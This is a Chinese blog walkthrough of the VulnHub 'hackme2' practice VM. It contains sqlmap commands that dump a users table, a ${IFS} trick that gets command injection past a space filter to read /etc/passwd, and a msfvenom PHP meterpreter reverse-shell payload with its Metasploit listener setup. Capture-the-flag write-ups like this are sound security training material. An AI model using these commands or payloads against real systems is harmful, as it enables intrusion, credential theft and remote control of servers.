vulhub靶场学习日记hackme2

已于 2022-07-12 21:29:35 修改
阅读量296 收藏 4
点赞数 1
文章标签: 大数据
于 2022-07-12 20:02:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55763479/article/details/125750520
版权

Hackme2靶机

目的:拿到root权限

下载地址:https://www.vulnhub.com/entry/hackme-2,618/

选择第二个mirror

Vm打开,网络模式我选择的是nat

开整

Kali ip地址:192.168.192.129

Nmap扫描:

1,2,254地址为网卡地址

192.168.192.130即为靶机地址

扫描端口

Dirb扫描目录

发现uploads目录,目测可能有文件上传漏洞

尝试弱密码登陆,失败了

先注册admin登陆一下

登陆后search一下

测试一下是否有sql注入点

判断具有sql注入,而且根据头部判断还是post注入

可以手工注入,也可以sqlmap,这里使用sqlmap

先抓包

保存成txt文本

Sqlmap

sqlmap -r /home/kali/Desktop/bp.txt -p search --dbs  

-r:指定文件

-p:指定参数

--dbs:数据库

爆表(webapphacking)

sqlmap -r /home/kali/Desktop/bp.txt -p search -D webapphacking –tables

爆字段

sqlmap -r /home/kali/Desktop/bp.txt -p search -D webapphacking -T users –columns

爆密码

sqlmap -r /home/kali/Desktop/bp.txt -p search -D webapphacking -T users -C name,pasword –dump

这个superadmin 的密码才是我想要的

http://www.somd5.com解密一下

Superadmin登陆,发现有上传点

且只能上传图片,上传图片码抓包改后缀也失败了

而且uploads目录无法访问,路径有变化

只能看另一个下面的框框

发现具有命令执行漏洞

查看/etc/passwd文件,发现空格过滤

采用${IFS}代替空格绕过

 Linux 下的变量$IFS。

Shell 的环境变量分为 set, env 两种,其中 set 变量可以通过 export 工具导入到 env 变量中。其中,set 是显示设置 shell 变量,仅在本 shell 中有效;env 是显示设置用户环境变量 ,仅在当前会话中有效。换句话说,set 变量里包含了 env 变量,但 set 变量不一定都是 env变量。这两种变量不同之处在于变量的作用域不同。显然,env 变量的作用域要大些,它可以在 subshell 中使用。

而 IFS 是一种 set 变量,当 shell 处理"命令替换"和"参数替换"时,shell 根据 IFS 的值,默认是 space, tab, newline 来拆解读入的变量,然后对特殊字符进行处理,最后重新组合赋值给该变量

查看welcomeadmin.php源码,发现真正上传点/uploads/year2020/

所以思路是文件上传反弹shellphp的png格式,再利用命令执行漏洞将png改回php

开整

利用msfvenom平台生成木马

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.192.129 lport=7777 R > shell3.php

(防止没有权限执行)

chmod 777 shell3.php

上传png格式

查看是否修改成功

kali开启msfconsole平台

1 使用handler监听模块

msf > use exploit/multi/handler

2 设置payload

msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp

PAYLOAD =>php/meterpreter/reverse_tcp

3 设置监听主机

msfexploit(multi/handler) > set LHOST 192.168.192.129

LHOST =>192.168.192.129

4 设置监听端口(默认4444

msfexploit(multi/handler) > set LPORT 7777

LPORT => 7777

5 发动攻击

msfexploit(multi/handler) > exploit

:exploit之前要远程访问你上传的后门文件 ,并监听

攻击前监听端口

执行该文件

Exploit攻击

反弹成功

后面步骤与hackme1一样

北纬二十七度雨
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
oscp——Hackademic: RTB2
王嘟嘟的博客
02-22 714
0x00 前言 这是第34台机子啦。 0x01 信息收集 0x02 Web80——webshell 访问一下80端口的内容 这里使用万能密码进行绕过,获取到秘钥 先进行一个url的解码 然后进行ascii解码 先将空格去除 00110001 00110000 00110000 00110001 00111010 00110001 00110001 ...
Hackademic.RTB2
hovcfuti的博客
11-01 76
当然,对于这个端口的访问,你可以给定一个IP地址范围的限制,但是这样一来,还是带来了安全问题和访问挑战方面的问题。端口碰撞技术让你在这两个方面都会处理的很好:在大多数时间里,这个端口都是关闭的,但是知道这种方法的可以在任何时候任何地方打开这个端口。这些尝试要么记录在一个日志中,要么保存在一个后台进程中,通过预先配置这个日志或者进程来监视打开相应端口的序列,如果尝试序列与预先设置的序列相符合,就可以打开某个端口。这里不清楚利用方式,百度了一下,发现是一个叫端口碰撞的技术。
Vulnhub靶机:HACKADEMIC_ RTB1
LainWith的博客
12-23 627
Hackademic(此系列共2台)发布日期:2011年9月6日难度:初级运行环境:VMware Workstation目标:取得 root 权限 + flag主机发现端口扫描+漏洞扫描Sql注入wordpress挂马内核提权。
VulnHub】【2023年07月18日】最新全部靶场详情(下)
惟忆
07-18 8591
VulnHub】【2023年07月18日】最新全部靶场详情(下)
Vulnhub-hackme2
GALi_233的博客
03-20 3884
Description ‘hackme2’ is a medium difficulty level box. This is the second part of the hackme series where more controls are in place do deter malicious attacks. In addition, you will have to think out of the box to exploit the vulnerabilites. The goal is
靶机渗透 HACKME-2 (详细渗透,适合新手渗透)
君莫hacker的博客
09-06 3482
靶机HACKME:2的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-2,618/ 作者 x4bx54 发布日期 2020年12月6日 难度 中等 靶机基本介绍: hackme2”是一个中等难度的关卡。这是hackme系列的第二部分,其中有更多的控件用于阻止恶意攻击。此外,你还必须跳出框框来利
vulnhub靶场hackme2-DCHP
weixin_42478365的博客
06-04 694
sql注入(空格绕过),命令执行漏洞(空格绕过)、SUID提权、Burp联动xray
16个网络安全常用的练习靶场(小白必备)
qq_44005305的博客
01-31 2246
DVWA-WooYun是一个基于DVWA的PHP+Mysql漏洞模拟练习环境,通过将乌云主站上的有趣漏洞报告建模,以插件形式复现给使用该软件的帽子们,可以让乌云帽子们获得读报告体验不到的真实感,在实践的过程中可以无缝隙地深入理解漏洞的原理及利用方式 中英双字,如果您语文学的不好不必担心了,界面提示英文的(DVWA原厂),内容提示中英双字(后来觉得比较眼花,所以去掉了部分英文)这是一个争议比较大的问题,有的人会建议先学编程,而有的人会建议先学计算机基础,其实这都是要学的。而且这些对学习网络安全来说非常重要。
Vulnhub--hackme2
weixin_45168704的博客
06-12 142
拿下hackme2
vulhub靶场.zip
10-14
vulhub靶场
vulhub靶场文件(不用积分)
05-18
使用Vulhub一键搭建漏洞测试靶场,下载日期2020/05/18。 kali下安装命令 apt-get install docker.io apt-get install docker-compose cd cd /vulhub/flask/ssti service docker start docker-compose up -d
vulhub靶场搭建安装包,包含docker-compose安装包
02-01
使用这条命令西在docker-compose太慢了而且老失败 sudo curl -L "https://github.com/docker/compose/releases/download/1.29.2/docker-compose-$(uname -s)-$...我这边包需要下载的都提供了,助力你搭建vulhub靶场
详解 Vulhub 靶场搭建
06-12
手把手教你vulhub搭建命令和过程
vulhub漏洞测试靶场
08-16
vulhub-master.zip
hackme-2靶机渗透详解
大熊
06-12 329
这个靶机的难度适中,通过这个靶机的联系,感觉更可以增强自己对这些漏洞执行的连贯性,靶机主要考察了目录扫描,sql注入(这里要绕过空格过滤),文件上传与命令执行的结合,反弹shell及提权。该靶机可以串通各部分知识,值得一做。
vAPI-API漏洞靶场通关指南
piaolin_ying的博客
05-06 4000
基础准备 VAPI介绍 vAPI是一款针对OWASP Top 10漏洞的练习靶场,vAPI项目是一个故意引入了多种漏洞的可编程接口API,广大研究人员可以利用vAPI来研究和练习OWASP Top 10漏洞。 安装(Docker) git clone https://github.com/roottusk/vapi.git cd vapi/ docker-compose up -d 安装完成默认后访问 http://IP:80/vapi/ 即可访问 vAPI。 Postman配置 Postman是一个独
Hackme2靶机总结
qq_45301512的博客
12-17 341
(2) 先用最普通的测post的跑一下,发现不行,根据最后的提示,可以加上 –level 参数 和 –tramper=space2comment 参数。看了网上的答案,发现/home/legacy下存在一个touchmenot可执行文件,运行就能提权。使用msfvenom生成一个php的tiquan.php,上传到/var/www/html目录下。=eval 代替
hackme-2
qq_45747465的博客
06-12 108
打靶--hackme-2
HACKME-2 打靶
weixin_57315671的博客
06-16 71
靶机描述:靶机地址:https://www.vulnhub.com/entry/hackme-2,618/超级管理员用户superadmin的密码为Uncrackable。开启一台kali作为攻击机,将两台机子均设为NAT模式。2. 注册用户,admin,密码为123456。1.进入主页发现是登录页面,且可以注册用户。6.浏览器访问 空白页面说明上传成功。超级管理员登录,发现有文件上传点。尝试union联合注入。获取数据库名等基本信息。5.上传文件并改后缀。7.kali开启监听。
vulhub靶场的综述
最新发布
12-06
2. vulhub靶场的环境搭建非常简单,只需要下载相应的docker镜像并运行即可,无需复杂的配置和安装过程。 3. vulhub靶场的漏洞环境非常真实,用户可以在安全的环境下进行漏洞攻击和测试,提高自己的安全意识和技能。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值